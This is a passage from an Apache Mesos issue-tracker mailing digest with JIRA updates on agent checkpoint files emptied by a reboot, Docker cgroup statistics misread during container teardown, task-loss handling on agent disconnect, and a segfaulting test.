6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] 
on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
()
{noformat}
Meanwhile, the agent is being rebooted:
{noformat}
$ last reboot
reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
{noformat}
The agent log did not show any information about the task, possibly because 
there was no fsync before reboot:
{noformat}
I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
-- Reboot --
I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
/var/log/mesos/mesos-agent.log
{noformat}
However, the agent was checkpointing the task before reboot:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
  Size: 39  Blocks: 0  IO Block: 4096   directory
Device: ca40h/51776dInode: 67306254Links: 3
Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-24 00:23:43.237322609 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
And since there was no fsync before reboot, all checkpoints resulted in empty 
files:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967500Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:15:41.485506070 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967495Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 23:00:42.190975780 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 67306255Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:12:25.751463030 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
So were {{forked.pid}} and {{task.info}}.

As a result, the agent failed to recover after reboot:
{noformat}
E0123 17:15:41.00  2709 slave.cpp:6800] EXIT with status 1: Failed to 
perform recovery: Failed to recover framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from 

[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336700#comment-16336700
 ] 

Jie Yu commented on MESOS-8480:
---

I checked the kernel code, looks like when a process exits (or killed), but 
hasn't been reaped yet (zombie), the proc file `/proc//cgroup` will still 
exist, but the cgroup of the task will be set to root cgroup:

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5194]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n1003]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/exit.c?h=v4.1.49#n757]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5357]

 

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-7911:
---
Description: 
Currently, when framework with checkpointing disabled has tasks running on an 
agent and that agent disconnects from the master, the master will mark those 
tasks LOST and remove them from its memory. The assumption is that the agent is 
disconnecting because it terminated.

However, it's possible that this disconnection occurred due to a transient loss 
of connectivity and the agent re-connects while never having terminated. This 
case violates our assumption of there being no unknown tasks to the master:

```
 void Master::reconcileKnownSlave(
 Slave* slave,
 const vector& executors,
 const vector& tasks)
 {
 ...

// TODO(bmahler): There's an implicit assumption here the slave
 // cannot have tasks unknown to the master. This _should_ be the
 // case since the causal relationship is:
 // slave removes task -> master removes task
 // Add error logging for any violations of this assumption!
 ```

As a result, the tasks would remain on the agent but the master would not know 
about them!

A more appropriate action here would be:

# When an agent disconnects, mark the tasks as unreachable.
## If the framework is not partition aware, only show it the last known task 
state.
## If the framework is partition aware, let it know that it's now unreachable.
# If the agent re-connects:
## And the agent had restarted, let the non-checkpointing framework know its 
tasks are GONE/LOST.
## If the agent still holds the tasks, the tasks are restored as reachable.
# If the agent gets removed:
## For partition aware non-checkpointing frameworks, let them know the tasks 
are unreachable.
## For non partition aware non-checkpointing frameworks, let them know the 
tasks are lost and kill them if the agent comes back.

  was:
Currently, when framework with checkpointing disabled has tasks running on an 
agent and that agent disconnects from the master, the master will mark those 
tasks LOST and remove them from its memory. The assumption is that the agent is 
disconnecting because it terminated.

However, it's possible that this disconnection occurred due to a transient loss 
of connectivity and the agent re-connects while never having terminated. This 
case violates our assumption of there being no unknown tasks to the master:

```
void Master::reconcileKnownSlave(
Slave* slave,
const vector& executors,
const vector& tasks)
{
  ...

  // TODO(bmahler): There's an implicit assumption here the slave
  // cannot have tasks unknown to the master. This _should_ be the
  // case since the causal relationship is:
  //   slave removes task -> master removes task
  // Add error logging for any violations of this assumption!
```

As a result, the tasks would remain on the agent but the master would not know 
about them!

A more appropriate action here would be:

(1) When an agent disconnects, mark the tasks as unreachable.
  (a) If the framework is not partition aware, only show it the last known task 
state.
  (b) If the framework is partition aware, let it know that it's now 
unreachable.
(2) If the agent re-connects:
  (a) And the agent had restarted, let the non-checkpointing framework know its 
tasks are GONE/LOST.
  (b) If the agent still holds the tasks, the tasks are restored as reachable.
(3) If the agent gets removed:
  (a) For partition aware non-checkpointing frameworks, let them know the tasks 
are unreachable.
  (b) For non partition aware non-checkpointing frameworks, let them know the 
tasks are lost and kill them if the agent comes back.


> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
>  void Master::reconcileKnownSlave(
>  Slave* slave,
>  const vector& executors,
>  const vector& tasks)
>  {
>  ...
> // TODO(bmahler): There's an implicit assumption here the slave
>  // cannot have tasks unknown to the master. This _should_ be the
>  // case since the causal relationship 

[jira] [Updated] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8453:
---
Sprint: Mesosphere Sprint 73

> ExecutorAuthorizationTest.RunTaskGroup segfaults.
> -
>
> Key: MESOS-8453
> URL: https://issues.apache.org/jira/browse/MESOS-8453
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Affects Versions: 1.5.0
> Environment: Ubuntu 14.04 with SSL.
>Reporter: Alexander Rukletsov
>Assignee: Benjamin Mahler
>Priority: Major
>  Labels: flaky-test
> Attachments: RunTaskGroup-badrun.txt
>
>
> {noformat}
> 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if 
> you are using GNU date ***
> 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID 
> 0x7f36e2722700) from PID 18446744072769538424; stack trace: ***
> 14:32:50 @ 0x7f36dcc763fd (unknown)
> 14:32:50 @ 0x7f36dcc7b419 (unknown)
> 14:32:50 @ 0x7f36dcc6f918 (unknown)
> 14:32:50 @ 0x7f36eb99e330 (unknown)
> 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 @ 0x7f36ef12bd22 
> _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_
> 14:32:50 @ 0x7f36ef12c834 
> _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv
> 14:32:50 @ 0x7f36ee1c1e8a 
> _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_
> 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume()
> 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume()
> 14:32:50 @ 0x7f36ef134216 
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv
> 14:32:50 @ 0x7f36ec15a5b0 (unknown)
> 14:32:50 @ 0x7f36eb996184 start_thread
> 14:32:50 @ 0x7f36eb6c2ffd (unknown)
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8453:
--

Assignee: Benjamin Mahler

> ExecutorAuthorizationTest.RunTaskGroup segfaults.
> -
>
> Key: MESOS-8453
> URL: https://issues.apache.org/jira/browse/MESOS-8453
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Affects Versions: 1.5.0
> Environment: Ubuntu 14.04 with SSL.
>Reporter: Alexander Rukletsov
>Assignee: Benjamin Mahler
>Priority: Major
>  Labels: flaky-test
> Attachments: RunTaskGroup-badrun.txt
>
>
> {noformat}
> 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if 
> you are using GNU date ***
> 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID 
> 0x7f36e2722700) from PID 18446744072769538424; stack trace: ***
> 14:32:50 @ 0x7f36dcc763fd (unknown)
> 14:32:50 @ 0x7f36dcc7b419 (unknown)
> 14:32:50 @ 0x7f36dcc6f918 (unknown)
> 14:32:50 @ 0x7f36eb99e330 (unknown)
> 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 @ 0x7f36ef12bd22 
> _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_
> 14:32:50 @ 0x7f36ef12c834 
> _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv
> 14:32:50 @ 0x7f36ee1c1e8a 
> _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_
> 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume()
> 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume()
> 14:32:50 @ 0x7f36ef134216 
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv
> 14:32:50 @ 0x7f36ec15a5b0 (unknown)
> 14:32:50 @ 0x7f36eb996184 start_thread
> 14:32:50 @ 0x7f36eb6c2ffd (unknown)
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8479) Document agent SIGUSR1 behavior.

2018-01-23 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8479?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach updated MESOS-8479:
---
Summary: Document agent SIGUSR1 behavior.  (was: Document agne SIGUSR1 
behavior.)

> Document agent SIGUSR1 behavior.
> 
>
> Key: MESOS-8479
> URL: https://issues.apache.org/jira/browse/MESOS-8479
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, documentation
>Reporter: James Peach
>Priority: Major
>
> The agent enters shutdown when it receives {{SIGUSR1}}. We should document 
> what this means, the corresponding behavior and how operators are intended to 
> use this.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.

2018-01-23 Thread JIRA

[ 
https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16291303#comment-16291303
 ] 

Gastón Kleiman edited comment on MESOS-8184 at 1/23/18 10:18 PM:
-

[https://reviews.apache.org/r/65300/]

[https://reviews.apache.org/r/64618/]


was (Author: gkleiman):
https://reviews.apache.org/r/64618/

> Implement master's AcknowledgeOfferOperationMessage handler.
> 
>
> Key: MESOS-8184
> URL: https://issues.apache.org/jira/browse/MESOS-8184
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Gastón Kleiman
>Priority: Major
>  Labels: mesosphere
>
> This handler should validate the message and forward it to the corresponding 
> agent/ERP.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Story Points: 2  (was: 3)

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
